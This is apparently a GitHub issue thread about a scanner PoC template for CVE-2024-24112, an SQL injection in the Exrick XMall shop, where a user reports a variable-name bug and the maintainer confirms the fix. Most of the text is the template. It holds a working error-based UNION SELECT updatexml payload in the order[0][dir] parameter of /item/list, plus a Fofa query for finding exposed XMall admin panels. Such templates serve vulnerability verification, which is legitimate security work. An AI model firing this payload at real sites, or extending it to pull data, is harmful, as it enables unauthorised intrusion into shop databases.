Closed scarleast closed 8 months ago
expression中,md5运算的变量应该为randstr,poc中为rand。
id: CVE-2024-24112 info: name: Exrick XMall 开源商城 SQL注入漏洞 author: zan8in severity: high verified: true description: |- Fofa: app="XMall-后台管理系统" reference: - https://mp.weixin.qq.com/s/HqVQrUr6iRv94BmrVd_gOw tags: cve,cve2024,sqli created: 2024/02/21 set: randstr: randomInt(200000000, 210000000) rules: r0: request: method: GET path: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5({{randstr}}),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 expression: response.status == 200 && response.body.bcontains(bytes(md5(string(randstr)))) expression: r0()
感谢,已经修复,并更新到Github
expression中,md5运算的变量应该为randstr,poc中为rand。